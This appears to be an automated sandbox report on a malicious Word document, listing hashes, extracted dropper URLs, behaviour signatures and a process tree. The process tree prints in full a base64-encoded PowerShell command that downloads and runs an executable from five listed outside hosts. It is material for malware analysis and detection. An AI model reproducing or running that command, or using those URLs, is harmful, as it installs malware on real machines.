Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    113s
  • max time network
    110s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/04/2024, 05:28

General

  • Target

    0287c310be61abadd714d26d78a476fe_JaffaCakes118.doc

  • Size

    152KB

  • MD5

    0287c310be61abadd714d26d78a476fe

  • SHA1

    1bf1e8b62f25393ad15dc9b3177c7bc118ff4d91

  • SHA256

    ea4bcbe90240950b3246ac90b8c4dbf5c2f03b839328ea0583e893e0ad72ddb9

  • SHA512

    a1b1e024c73c67dcd1fd35086b200a5a92f2d88f5db9c499e286b925626894628e0dd529e417ec0ea75266bbdc82f8c5fa371f69a9d20cc11e522e6ce8df8049

  • SSDEEP

    3072:J77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qP/fhJEQiAEoS5y3zedm:J77HUUUUUUUUUUUUUUUUUUUT52VmfhCW

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://pressuredspeech.com/dngn/cEmgNTByQ/

exe.dropper

https://phoneringtones.info/wp-content/uploads/qx93_k68trw3j-15334/

exe.dropper

http://safeservicesfze.com/wp-admin/ZmVYmAXv/

exe.dropper

https://freewallpaperdesktop.com/wp-includes/50lz_zkln03lbc-8209361/

exe.dropper

http://noingoaithatthanhnam.com/wp-admin/voytvHre/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0287c310be61abadd714d26d78a476fe_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4592
  • C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
    powErSHell -e JABRADYAMgA1ADYANwAxADEAPQAnAFcAMQA3ADYANQAwAF8AJwA7ACQAcwA3ADUAXwA3ADkAIAA9ACAAJwA5ADUAOQAnADsAJAB3ADEAOQAyADYAOAAwAD0AJwBkADIANAAyADMAMwAnADsAJABuADgAMQBfADUANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcwA3ADUAXwA3ADkAKwAnAC4AZQB4AGUAJwA7ACQAbgA3ADIAOABfADIAPQAnAGkAOAA0ADMANwBfACcAOwAkAFAAMgAzADEAOQAzAD0ALgAoACcAbgBlACcAKwAnAHcAJwArACcALQBvAGIAagBlAGMAdAAnACkAIABuAEUAVAAuAFcAYABFAGIAYwBgAEwAYABpAEUAYABOAHQAOwAkAEsAOAAzAF8AOAA3AD0AJwBoAHQAdABwADoALwAvAHAAcgBlAHMAcwB1AHIAZQBkAHMAcABlAGUAYwBoAC4AYwBvAG0ALwBkAG4AZwBuAC8AYwBFAG0AZwBOAFQAQgB5AFEALwBAAGgAdAB0AHAAcwA6AC8ALwBwAGgAbwBuAGUAcgBpAG4AZwB0AG8AbgBlAHMALgBpAG4AZgBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBxAHgAOQAzAF8AawA2ADgAdAByAHcAMwBqAC0AMQA1ADMAMwA0AC8AQABoAHQAdABwADoALwAvAHMAYQBmAGUAcwBlAHIAdgBpAGMAZQBzAGYAegBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBaAG0AVgBZAG0AQQBYAHYALwBAAGgAdAB0AHAAcwA6AC8ALwBmAHIAZQBlAHcAYQBsAGwAcABhAHAAZQByAGQAZQBzAGsAdABvAHAALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADUAMABsAHoAXwB6AGsAbABuADAAMwBsAGIAYwAtADgAMgAwADkAMwA2ADEALwBAAGgAdAB0AHAAOgAvAC8AbgBvAGkAbgBnAG8AYQBpAHQAaABhAHQAdABoAGEAbgBoAG4AYQBtAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB2AG8AeQB0AHYASAByAGUALwAnAC4AUwBQAEwASQBUACgAJwBAACcAKQA7ACQAdwA5ADMAOAAxAF8AOQA5AD0AJwBPADMAMQBfADQAMwAwADgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGwAMgA3ADAANwBfADQAIABpAG4AIAAkAEsAOAAzAF8AOAA3ACkAewB0AHIAeQB7ACQAUAAyADMAMQA5ADMALgBkAG8AVwBuAGwAbwBhAEQARgBpAGwARQAoACQAbAAyADcAMAA3AF8ANAAsACAAJABuADgAMQBfADUANwApADsAJAB3ADAAXwBfADkAXwBfAD0AJwB1ADYANwA2ADcAMgA2ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAbgA4ADEAXwA1ADcAKQAuAEwARQBuAGcAdABIACAALQBnAGUAIAAyADAANgA5ADcAKQAgAHsAJgAoACcASQBuACcAKwAnAHYAbwBrAGUALQBJAHQAZQAnACsAJwBtACcAKQAgACQAbgA4ADEAXwA1ADcAOwAkAHIAOQA1ADgAXwAwAD0AJwBoADUAMQA0ADAAOQAnADsAYgByAGUAYQBrADsAJABJADkANABfADEAMQAwADMAPQAnAGkAOQA2ADkAMAAzADEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAZgA3ADIAMQAxADAAMAA9ACcAWgA3ADcAMAAzADAAXwAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1892

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mnauckx3.ssn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1892-60-0x00007FF948820000-0x00007FF9492E1000-memory.dmp

    Filesize

    10.8MB

  • memory/1892-44-0x00007FF948820000-0x00007FF9492E1000-memory.dmp

    Filesize

    10.8MB

  • memory/1892-35-0x000001F5F8460000-0x000001F5F8482000-memory.dmp

    Filesize

    136KB

  • memory/4592-16-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-31-0x0000020A0B8D0000-0x0000020A0C0D0000-memory.dmp

    Filesize

    8.0MB

  • memory/4592-7-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-6-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-8-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-9-0x00007FF931080000-0x00007FF931090000-memory.dmp

    Filesize

    64KB

  • memory/4592-10-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-11-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-13-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-14-0x00007FF931080000-0x00007FF931090000-memory.dmp

    Filesize

    64KB

  • memory/4592-15-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-12-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-18-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-17-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-0-0x00007FF9337F0000-0x00007FF933800000-memory.dmp

    Filesize

    64KB

  • memory/4592-23-0x0000020A0B8D0000-0x0000020A0C0D0000-memory.dmp

    Filesize

    8.0MB

  • memory/4592-24-0x0000020A11CD0000-0x0000020A11ED0000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-5-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-32-0x0000020A0B8D0000-0x0000020A0C0D0000-memory.dmp

    Filesize

    8.0MB

  • memory/4592-33-0x0000020A0FB20000-0x0000020A10AF0000-memory.dmp

    Filesize

    15.8MB

  • memory/4592-4-0x00007FF9337F0000-0x00007FF933800000-memory.dmp

    Filesize

    64KB

  • memory/4592-3-0x00007FF9337F0000-0x00007FF933800000-memory.dmp

    Filesize

    64KB

  • memory/4592-2-0x00007FF9337F0000-0x00007FF933800000-memory.dmp

    Filesize

    64KB

  • memory/4592-52-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-53-0x0000020A0B8D0000-0x0000020A0C0D0000-memory.dmp

    Filesize

    8.0MB

  • memory/4592-54-0x0000020A11CD0000-0x0000020A11ED0000-memory.dmp

    Filesize

    2.0MB

  • memory/4592-55-0x0000020A0B8D0000-0x0000020A0C0D0000-memory.dmp

    Filesize

    8.0MB

  • memory/4592-56-0x0000020A0B8D0000-0x0000020A0C0D0000-memory.dmp

    Filesize

    8.0MB

  • memory/4592-57-0x0000020A0FB20000-0x0000020A10AF0000-memory.dmp

    Filesize

    15.8MB

  • memory/4592-1-0x00007FF9337F0000-0x00007FF933800000-memory.dmp

    Filesize

    64KB

  • memory/4592-79-0x00007FF9337F0000-0x00007FF933800000-memory.dmp

    Filesize

    64KB

  • memory/4592-80-0x00007FF9337F0000-0x00007FF933800000-memory.dmp

    Filesize

    64KB

  • memory/4592-82-0x00007FF9337F0000-0x00007FF933800000-memory.dmp

    Filesize

    64KB

  • memory/4592-81-0x00007FF9337F0000-0x00007FF933800000-memory.dmp

    Filesize

    64KB

  • memory/4592-83-0x00007FF973770000-0x00007FF973965000-memory.dmp

    Filesize

    2.0MB